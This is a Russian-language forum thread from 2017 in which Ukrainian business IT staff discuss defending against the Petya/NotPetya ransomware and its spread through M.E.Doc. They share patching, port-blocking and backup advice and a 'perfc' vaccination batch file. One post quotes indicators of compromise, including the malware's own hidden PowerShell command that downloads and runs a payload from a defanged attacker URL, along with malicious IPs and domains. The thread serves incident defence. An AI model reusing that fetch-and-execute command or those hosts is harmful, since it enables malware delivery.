Virus #Petya. На Украину обрушилась масштабная хакерская атака. Хроника-онлайн.

1. Ann.prog1C 27.06.17 17:01 Сейчас в теме
Собственно новость здесь: Virus #Petya. На Украину обрушилась масштабная хакерская атака. Хроника-онлайн.

У нас уже есть пользовательская машинка с экземпляром.
Кто что может посоветовать?
Отключиться от интернета и закрыть фирму возможности нет.
Вознаграждение за ответ
Показать полностью
Найденные решения
2. Cooler 22 27.06.17 17:17 Сейчас в теме
(1)
Кто что может посоветовать?
Для начала - жестко вразумить все прокладки между стулом и монитором, чтобы не открывали писем с неизвестных (и даже вроде бы известных) адресов и не переходили по ссылкам в них, как бы заманчиво те не выглядели.

Этого должно быть достаточно для предотвращения заражения извне.

Ну, и если механизм распространения Petya внутри сети аналогичен механизму WannaCry, то вся Windows в конторе должна быть пропатчена от уязвимости MS17-010.
Остальные ответы
Подписаться на ответы Инфостарт бот Сортировка: Древо развёрнутое
Свернуть все
2. Cooler 22 27.06.17 17:17 Сейчас в теме
(1)
Кто что может посоветовать?
Для начала - жестко вразумить все прокладки между стулом и монитором, чтобы не открывали писем с неизвестных (и даже вроде бы известных) адресов и не переходили по ссылкам в них, как бы заманчиво те не выглядели.

Этого должно быть достаточно для предотвращения заражения извне.

Ну, и если механизм распространения Petya внутри сети аналогичен механизму WannaCry, то вся Windows в конторе должна быть пропатчена от уязвимости MS17-010.
3. Ann.prog1C 27.06.17 17:29 Сейчас в теме
Нужен дельный совет.

(2)
Ну, и если механизм распространения Petya внутри сети аналогичен механизму WannaCry, то вся Windows в конторе должна быть пропатчена от уязвимости MS17-010.

только клиентские машины?
4. Denis_CFO 49 27.06.17 17:30 Сейчас в теме
(3)
Нужен дельный совет
копируйте инфу на съёмные диски, для начала.
5. Ann.prog1C 27.06.17 17:35 Сейчас в теме
(4) сеть очень сильно распределенная. Интернет рубанули и у меня теперь доступа к большинству серверов нет.
6. Denis_CFO 49 27.06.17 17:40 Сейчас в теме
(5) Берите машину, людей, телефон. Съемные носители. Загрузочную флешку. Теперь только последствия устранять и не допустить новых заражений. А вообще (2) абсолютно прав.
7. Ann.prog1C 27.06.17 17:45 Сейчас в теме
(6) машина не поможет - филиалы по всей Украине. Сейчас найду в каждом филиале самого свирепого менеджера и напишу текст, которые нужно с выражением прочитать пользователям. После этого включим интернет снова и сделаю копии. Ничего умнее не придумала.

SMB у нас и так везде закрыто.
8. Cooler 22 27.06.17 18:13 Сейчас в теме
(3)
только клиентские машины?
Вы смотрели материал по ссылке? Там только клиентские ОС?

По-моему, как раз наоборот: если в Инет выставлен непропатченный сервер с незакрытыми соответствующими портами, то вирус может его заразить и без участия пользователей.

А уж от сервера огребут и все незащищенные юзеры.
Ann.prog1C; +1 Ответить
23. Cooler 22 28.06.17 21:16 Сейчас в теме
Вот тут приведен (без указания источника) рецепт предотвращения срабатывания вируса в случае заражения:
До заражения создаете в папке C:\Windows пустой файл с именем "perfc" и ставите ему атрибут "Только чтение". Если вирус и попадет в систему, то он подумает, что она уже им заражена и не будет ничего делать. Во всяком случае, пока новую версию не выпустят.


Справедливости ради надо отметить, что расковыряли эту дырку в вирусе специалисты Symantec.

Ну, и особо стоит обратить внимание на оговорку про "новую версию" - наверняка в ней этот способ перестанет работать, поэтому без исполнения рекомендаций из (2) это просто заплатка для самоуспокоения.
9. profiprog1c 250 27.06.17 18:22 Сейчас в теме
(1) Вот что известно о вирусе на данный момент, вычитал в инете, копирую сюда

Маркеры компрометации:
File Name Order-20062017.doc (на самом деле RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6­D206
File Size 6215 bytes
File Type Rich Text Format data

Инициирует соединение с хостом

84.200.16.242 80

h11p://84.200.16.242/myguy.xls (на самом деле HTA)

File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C6­3BC6
File Size 13893 bytes
File Type Zip archive data

mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe')
10807.exe %APPDATA%\10807.exe" " (PID: 3096)

File Name BCA9D6.exe
MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF­1FBD
File Size 275968 bytes

Инициирует соединение с хостом

111.90.139.247 80
COFFEINOFFICE.XYZ 80

Рекомендации:
- - - - - - - - - - - -

1) проверить журналы систем на наличие данных маркеров компрометации
2) По возможности на сетевом оборудовании и групповыми политиками заблокировать на системах и серверах порты 135, 445, 1024-1035 TCP
3) Если заражение произошло ни в коем случае не допускать перезагрузки системы (cmd /k shutdown -a)
4) Системы, которые зашифрованы, не форматировать сразу, а снять образ диска (может потом появится какой-то ключ к расшифровке)
5) Блокировать запуск .exe в %AppData% та %Temp%
Ann.prog1C; +1 Ответить
10. Ann.prog1C 27.06.17 18:46 Сейчас в теме
13. alex_sh2008 5 27.06.17 22:26 Сейчас в теме
(1)ужесточить политику антивируса, закрыть любой доступ для пользователей к скачиванию из интернета исполняемого контента, у пользователей закрыть административный доступ к локальному компьютеру.
11. KontoraB 27.06.17 21:56 Сейчас в теме
Медок стоял на сервере вместе с 1С ?
В антивирусе стоит исключение чтоб Медок не проверять ? ( об этом настаивают спецы Медка )

P S Если в Медок накатать телегу о возмещении ущерба ?
Ann.prog1C; +1 Ответить
12. KontoraB 27.06.17 22:05 Сейчас в теме
P P S у меня 100 % уверенность что заражение идет через медок так как идет через него обмен файлами накладными посредством интернета + спец медка настойчиво просят чтоб во всех антивирях медок был в исключениях

P P P S сча сам медок активно колбасит
15. Ann.prog1C 28.06.17 00:17 Сейчас в теме
(12) да http://biz.liga.net/all/it/novosti/3697261-ataka-voznikla-iz-za-programmy-m-e-doc-kiberpolitsiya.htm
не Вы один так считаете. У нас, к счастью, пострадал только один компьютер - именно на нем и был установлен медок.
14. KontoraB 27.06.17 23:30 Сейчас в теме
Завтра буду вскрывать - поделюсь опытом
16. Ann.prog1C 28.06.17 00:37 Сейчас в теме
17. Cooler 22 28.06.17 01:46 Сейчас в теме
(16)
Что-то изобрели.
Ага, "изобрели" - ни единой ссылки на чудо-утилиты.

Потому что "изобретатели" не там, а где-то совсем в другом месте. Возможно, у Касперского. Или еще где-то. Причем, "изобретение" состоялось еще в апреле: https://blog.kaspersky.ru/petya-decryptor/11585/

Тут и текст похож, и картинки те же самые (кто у кого скопипастил, как думаете?), но зато есть ссылки и действительно можно пробовать.

Осталось надеяться, что это тот же самый Petya, что не гарантируется - по идее, Касперский должен опознавать его еще с апреля.
Ann.prog1C; +1 Ответить
18. KontoraB 28.06.17 06:35 Сейчас в теме
(17) Это изобретение 16 года и не факт что оно сработает
21. Cooler 22 28.06.17 13:39 Сейчас в теме
(18)
Это изобретение 16 года и не факт что оно сработает
Точно, я среди ночи этого даже не заметил.

Ну, тогда шансы на "исцеление" еще меньше.
19. Ann.prog1C 28.06.17 08:53 Сейчас в теме
(17) Касперского и drWeb у нас благополучно победили. Закончится подписка и ВСЕ. Будем аваст юзать.
20. nikolayD 5 28.06.17 10:06 Сейчас в теме
(19) просто планомерно уничтожают ИТ в государстве, всеми возможными средствами.
31. Gr@y 6 29.06.17 12:53 Сейчас в теме
(19) Каспера то за что? Его управляющая компания в Англии
Ну и филиалы по разным странам...
22. nikolayD 5 28.06.17 16:38 Сейчас в теме
Вирусная атака на компьютеры госучреждений и компаний, расположенных на Украине, в России и странах Европы, началась с того, что «некоторые корпоративные пользователи» установили зараженную вирусом Petya.C программу для бухгалтерской отчетности M.E.Doc. Эта программа широко используется в украинских компаниях. К такому заключению пришли специалисты компании ESET, которая разрабатывает антивирусное программное обеспечение, говорится в поступившем в РБК пресс-релизе.

Подробнее на РБК:
http://www.rbc.ru/technology_and_media/28/06/2017/5953a8c69a79472844f7c6d0?from=main
Ann.prog1C; +1 Ответить
24. starik-2005 3060 28.06.17 22:30 Сейчас в теме
С учетом того, что не так давно в сеть утекли исходники винды, есть мнение, что новые дыры в ней будут найдены и заюзаны. Исходники линя, кстати, в сети уже 30 лет.
25. KontoraB 29.06.17 06:19 Сейчас в теме
P S Как вариант - убираете в антивирусе Медок из исключений , проверяете компьютер - если антивирус распознал медок как вирус - звоните в тех поддержку Медка и записываете все то что скажут работники тех поддержки
Ann.prog1C; +1 Ответить
26. KontoraB 29.06.17 06:22 Сейчас в теме
Вчера бодался с одним сервером - фирму спасло то что вирус полез на ССД с системой а диск с данными остался цел
30. Ann.prog1C 29.06.17 12:13 Сейчас в теме
(26) тогда логично завернуть медок через прокси - хоть протоколы останутся :)
27. KontoraB 29.06.17 06:25 Сейчас в теме
28. Rust 29.06.17 06:58 Сейчас в теме
Выведи эту машину в DMZ зону
29. Rust 29.06.17 06:59 Сейчас в теме
32. KontoraB 29.06.17 14:05 Сейчас в теме
Всем предприятиям которые пострадали в результате заражения вирусом - обязательно написать заявы в полицию о вирусной атаке ( дабы прикрыть свою попу в случае чего ) например за невовремя сданные отчет или налоговые накладные чтоб не было санкций ...
34. starik-2005 3060 29.06.17 15:55 Сейчас в теме
(32)
например за невовремя сданные отчет или налоговые накладные
А это никого не волнует - за свою ИТ-инфраструктуру бизнес сам несет ответственность.
33. Ann.prog1C 29.06.17 15:48 Сейчас в теме
35. pm74 202 29.06.17 16:23 Сейчас в теме
(33) интересно , что ни картинок ни видео в списках не значится
файлов БД впрочем тоже нет
36. Ann.prog1C 29.06.17 16:59 Сейчас в теме
А вот и конкуренты медка подсуетились (получила с рассылкой):
E-COM уверенно выстоял от угрозы вируса Petya.A
37. v3rter 29.06.17 17:29 Сейчас в теме
Батник с "вакциной".

@echo off
REM Administrative check from here: stackoverflow.com/questions/4051883/batch-script-how-to-check-for-admin-rights
REM Vaccination discovered by twitter.com/0xAmit/status/879778335286452224
REM Batch file created by Lawrence Abrams of BleepingComputer.com. @bleepincomputer @lawrenceabrams

echo Administrative permissions required. Detecting permissions...
echo.
		
net session >nul 2>&1

if %errorLevel% == 0 (
	if exist C:\Windows\perfc (
		echo Computer already vaccinated for NotPetya/Petya/Petna/SortaPetya.
		echo.
	) else (
		echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc
                echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dll
                echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dat

		attrib +R C:\Windows\perfc
		attrib +R C:\Windows\perfc.dll
		attrib +R C:\Windows\perfc.dat

		echo Computer vaccinated for current version of NotPetya/Petya/Petna/SortaPetya.
		echo.
	)
) else (
	echo Failure: You must run this batch file as Administrator.
)
  
pause
Показать
Упомянутого твита уже нет. Проверка "net session" провалится, если не запущена служба "сервер".

Запускать от имени админа.
38. mikki_1C 03.07.17 15:25 Сейчас в теме
Около 100 пользователей - вся почта через фильтр по исполняемым, содержимое архивов - также, не читаемые и запароленные архивы - сразу в топку, большинство пользователей с сильно урезанными правами (только работа). Ну и самое важное, периодически ликбез на тему серфинга - т.е. банальная компьютерная грамотность - не надо на автомате не задумываясь клацать на всплывающие сообщения
Не редко приходят письма - "судебное уведомление - откройте срочно", "к вам едет ревизор - прочтите срочно" и т.д. :)
За 3 года - 2 шифровальщика добирались до своей цели - итог - быстрое восстановление файлов пользователя (политика хранения информации - только в личной на сервере) и продолжение работы (биткоины нам и самим нужны :)))
40. KontoraB 04.07.17 23:30 Сейчас в теме
ESET официально сегодня заявила что МЕДОС является вирусом

https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/
Ann.prog1C; +1 Ответить
41. nikolayD 5 05.07.17 09:08 Сейчас в теме
Даже немного странно.
43. KontoraB 05.07.17 22:34 Сейчас в теме
(41) Николай - а ты отключил автообновление 1С ?

P S Не говори ля пока не прочувствуешь ........
48. nikolayD 5 10.07.17 09:23 Сейчас в теме
(43) Жить стало лучше, жить стало веселее?
44. vipetrov2 06.07.17 06:49 Сейчас в теме
(41) Служба охраны президента уже давно работает на печатных машинках. https://habrahabr.ru/post/186302/

Самый надежный вариант поставить внешнее файловое хранилище и под правами добавление и чтение(удаление, изменение не давать) добавлять туда резервные копии.
45. pm74 202 06.07.17 07:33 Сейчас в теме
(44)
Служба охраны президента уже давно работает на печатных машинках. https://habrahabr.ru/post/186302/
а приказы наверное рассылают с голубями
42. v3rter 05.07.17 12:45 Сейчас в теме
Пока текущие поколения шифраторов ищут файлы по расширениям, есть лишний шанс уберечься, создавая архивы с расширениями .exe, .dll и т.п.
46. Ann.prog1C 06.07.17 16:40 Сейчас в теме
http://www.me-doc.com.ua/ - на сайте медка сегодня пустая страница...
47. profiprog1c 250 07.07.17 00:27 Сейчас в теме
(46) Сервера медка изъяты на проверку. Проверяют как к ним внедрили бэкдор. При этом, если кто-то продолжает использовать медок сейчас, должны понимать, что файл ZvitPublishedObjects.dll инфицирован этим бэкдором. Этот бекдор через эту ддлку может передавать такие данные как ЕДРПОУ, адрес электронной почты и пароль от электронной почты, возможно пароли от электронных ключей, но не сами электронные ключи, вроде бы.
49. v3rter 10.07.17 10:02 Сейчас в теме
Пожалуй, отключу автообновление в своих тестовых базах 1С. Скачать, переименовать exe в rar и распаковать архиватором - не такой уж и сложно, хоту руками, хоть скриптами.
50. KontoraB 26.07.17 19:17 Сейчас в теме
Оставьте свое сообщение

Для получения уведомлений об ответах подключите телеграм бот:
Инфостарт бот